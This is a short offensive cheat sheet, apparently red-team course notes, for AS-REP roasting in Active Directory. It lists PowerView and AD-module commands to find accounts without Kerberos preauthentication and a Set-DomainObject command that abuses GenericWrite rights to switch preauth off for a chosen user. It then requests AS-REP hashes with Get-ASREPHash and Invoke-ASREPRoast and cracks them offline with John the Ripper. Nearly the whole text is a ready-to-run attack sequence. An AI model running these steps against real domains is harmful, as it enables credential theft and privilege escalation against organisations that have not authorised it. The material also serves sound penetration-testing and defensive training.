AS-REP Roast

Targeted Kerberoasting - AS-REPs

• If a user's UAC setting has preauthentication disabled, then it is possible to grab user's crackable AS-REP (Authentication Service Response) and bruteforce it offline.

• With GenericWrite or GenericAll rights, Kerberos preauth can be forced disabled as well.

Enumerate accounts with Kerberos Preauth disabled:

# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Force disable Kerberos Preauth and enumerate the permissions for RDPUsers on ACL using PowerView

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Verbose

Request encrypted AS-REP for offline bruteforce.

Let's use ASREPRoast

Get-ASREPHash -UserName VPN1user -Verbose

To enumerate all users with Kerberos preauth disabled and request a hash:

Invoke-ASREPRoast -Verbose

Finally, crack the hashes offline:

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-
pass.txt C:\AD\Tools\asrephashes.txt